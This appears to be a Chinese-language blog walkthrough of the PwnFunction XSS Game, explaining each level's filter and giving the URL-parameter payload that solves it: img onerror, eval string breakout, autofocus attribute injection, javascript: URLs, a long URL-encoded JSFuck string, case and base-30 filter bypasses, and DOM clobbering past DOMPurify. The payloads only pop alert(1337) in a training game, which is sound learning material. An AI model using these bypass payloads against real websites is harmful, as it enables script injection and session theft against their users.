XSS的一些相关案例及DOM破坏的案例

目录

[Ma Spaghet!](#Ma Spaghet!)

Jefff

[Ugandan Knuckles](#Ugandan Knuckles)

[Ricardo Milos](#Ricardo Milos)

[Ah That's Hawt](#Ah That's Hawt)

Ligma

Mafia

[Ok, Boomer(DOM破坏)](#Ok, Boomer(DOM破坏))


网址:XSS Game - Learning XSS Made Simple! | Created by PwnFunction

Ma Spaghet!

来分析一下代码

就是一个URL类里进行一个get接收参数(somebody)如果没参数就默认接收(Somebody)这个参数,然后把它放进innerHTML里面去,然后再调用进h2标签中。

因为我看见了innerHTML,它禁用了一个方法也就是<script>标签,但也只限制了它一个标签,我们可以用<img>标签去编写

?somebody=<img%20src=1%20onerror="alert(1337)">

Jefff

先get传参,传入一个jeff如果没有传参就默然传参JEFFF

然后设置一个空值ma,然后再命令执行`ma="Ma name ${jeff}"`,最后设置一个定时器,ma将值赋值给h2标签

这道题跟上一道不一样,上一道用的是innerHTML安全系数明显比较低,因为它不能将标签也解析出来输出到页面中去,而这一道题innerText可以将标签也解析出来

?jeff=aaa";alert(1337);"

这个思路我们可以带进源代码看看无非就是这样

Eval(ma="Ma name ${jeff}")

Eval(`ma="Ma name aaa";alert(1337);""`)

或者这样使用-,这是连接符

?jeff="-alert(1337)-"

Ugandan Knuckles

无非就是过滤掉我的<>这个符号

Input里面有一个用户传递的值,只需将双引号闭合就是写上<script>,但是<>被过滤了。所以现在能使用点击事件onclick函数,或者onfocus函数,自动就加个autofocus函数

?wey=aaa"%20onfocus=alert(1337)%20autofocus="

Ricardo Milos

先分析一下代码,我发现了submmit这个提交事件,然后这个是在定时器里的,它获取了from表单的id,然后在两秒钟里面进行action的自动提交,而这个action正是from表单action属性。

然后action属性里面的内容可以直接写Js的语句,例如:

有了以上的例子,我们发现这个自动提交不会有这个麻烦,而且我们直接写在传参里面就可以了这个js语句

注意:它里面有个默认action提交到本地也就是那个#,两秒会自动出现,那么后面输入以下参数记得把提交到本地那个?milos=True#删掉再写下面这段代码

?ricardo=JavaScript:alert(1337)

Ah That's Hawt

分析一下代码,它过滤掉了( 、) 、` 和 \ 然后再使用innerHTML将它放到h2标签中去了。

因为使用到了innerHTML我就想到了第一关那种解法

?somebody=<img%20src=1%20οnerrοr="alert(1337)">

我发现它居然过滤掉了()那么函数就使用不了了

于是我就想到了用URLcode去转意一哈

先使用%28%29,发现结果与之前相同

于是我就想到了用URLcode去转意一哈,也就是先将%转换成%25然后(转换成%28)%29

发现不知道为什么%28%29没有转意

我就想到先用loction将它先变成字符串然后再执行,但是前面必须先要写上协议,才能执行后面的参数

?markassbrownlee=<img%20src=1%20onerror=location="JavaScript:alert%25281337%2529">

Ligma

我发现它字母数字不能使用了,只能使用编码的方式去绕过了

然后这里需要我们去一个网站:JSFuck - Write any JavaScript with 6 Characters: []()!+

我们直接拿过来是不行的,必须先要通过URLcoden编码才行

然后?balls=拿到的那一长串urlcode的编码

?balls=%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%5B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D((!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%2B%5B!%5B%5D%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B!%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(%2B(!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B%2B!%2B%5B%5D%5D))%5B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%2B%5B%5D)%5B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%5B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B((%2B%5B%5D)%5B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%2B%5B%2B!%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D%5D(!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%5D)%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D)()((!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D%2B%5B%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(%5B%2B%5B%5D%5D%2B!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D)

Mafia

过滤的东西明显就比较多,有` 、' 、 " 、+ 、\ 、[]

然后还限制长度50个字符

还过滤了特殊字符alter

突然感觉换个函数就可以了confirm(1337)

?mafia=confirm(1337)

感觉明显没什么意义

我寻思着如果那三个函数全过滤掉了,那么我该如何去解决呢?

我想起了function构造匿名函数,如果我使用Function()()也就是说去直接执行function()这个函数这个括号里面可以写我要去执行的内容

然后我就写了Function(/alert(1337)/)()

但是我又发现它过滤了alert,但是我想起可以使用大写啊可以绕过去

我又改为了Function(/ALERT(1337)/)()

我学xss的时候翻阅了资料知道了JS严格区分大小写还有就是JS不能编码符号

但是我们可以定义函数的,于是我去查阅了相关的官方手册,看看有没有什么能转小写的函数方法

于是我查到了toLowerCase()

现在改为了Function(/ALERT(1337)/.source.toLowerCase())()

// 匿名函数
?mafia=Function(/ALERT(1337)/.source.toLowerCase())()

同时也可以使用数字转字符串,将30进制的数字8680439转换成字符串,就是alert

eval(8680439..toString(30))(1337)

在URL后面加上 #alert(1337)

eval(location.hash.slice(1))

Ok, Boomer(DOM破坏)

我们发现居然存在DOMPurify.sanitize居然存在过滤框架,基本上绕不过,但是我们可以在

网上查一下这个框架的源码,发现之前写的危险函数和代码都用不到

只能往下考虑了,然后我发现哈这个ok这个参数好像没有,我等了两秒发现没有ok的弹出

先进入页面看一下

确定了ok确实没有这个参数,我们能不能构造一个ok呢?

在⽆法直接 XSS的情况下,我们就可以往 DOM Clobbering 这⽅向考虑了。 然后我发现可以使用Dom Clobbering

什么是Dom Clobbering?

例如:

我们发现居然取一个id它居然直接把整个标签都取出来了,这就是弱类型语言嘛

当然这个只是一部分,还有就是:

这个步骤是

先取出cookie,发现没有东西

首先创建一个元素是div

然后再给div赋值

然后再给这个div插入到boby中去

然后再去取出cookie,然后发现将div里面的包含cookie的值取出来了,弱类型语言取值本来取标签名,结果把整个标签取了出来

可以写一个html代码到网页上面去看看

无非就是将body下面的appendChild里面的元素转换成了字符串

然后再分析

Object.getOwnPropertyNames(window) //获取到了window下所以的属性名字

.filter(p=>p.match(/Element$/)) //过滤以获取后缀带element的

.map(p=>window[p]) //然后我把这个属性名称里面的值取出来

.filter(p=>p &&p.prototype &&p.prototype.toString

!== Object.prototype.toString)//然后这个p必须有prototype这个属性而且它这个属性上面还必须有tostring这个方法,并且不能是继承object这个上面的方法,必须是自身的

取出来两个值

我们明显发现这个第二个值就是a标签,我们都可以利⽤href 属性来进⾏字符串转换

我们去查相关文档发现

发现这个定时器可以把函数当成字符串然后去执行

那就好办了,a标签的href可以替换成字符串,然后定时器去执行,但是我们还得绕过那个框架

?boomer=<a%20id=ok%20href=mailto:alert(1337)>
?boomer=<a%20id=ok%20href=tel:alert(1337)>

boomer通过赋值,这个ok就先进带h2标签里面去了。然后就通过下面那个定时器通过id=ok把我传进去的a标签获取到了,但是由于获取到以后定时器就会在两秒后调用tostring方法,所以自己调用href里面的属性整个就会被当做字符串去执行了

相关推荐
小镇程序员3 分钟前
vue2 src_Todolist全局总线事件版本
前端·javascript·vue.js
野槐5 分钟前
前端图像处理(一)
前端
程序猿阿伟12 分钟前
《智能指针频繁创建销毁:程序性能的“隐形杀手”》
java·开发语言·前端
疯狂的沙粒14 分钟前
对 TypeScript 中函数如何更好的理解及使用?与 JavaScript 函数有哪些区别?
前端·javascript·typescript
瑞雨溪22 分钟前
AJAX的基本使用
前端·javascript·ajax
力透键背25 分钟前
display: none和visibility: hidden的区别
开发语言·前端·javascript
程楠楠&M36 分钟前
node.js第三方Express 框架
前端·javascript·node.js·express
盛夏绽放44 分钟前
Node.js 和 Socket.IO 实现实时通信
前端·后端·websocket·node.js
想自律的露西西★1 小时前
用el-scrollbar实现滚动条,拖动滚动条可以滚动,但是通过鼠标滑轮却无效
前端·javascript·css·vue.js·elementui·前端框架·html5
白墨阳1 小时前
vue3:瀑布流
前端·javascript·vue.js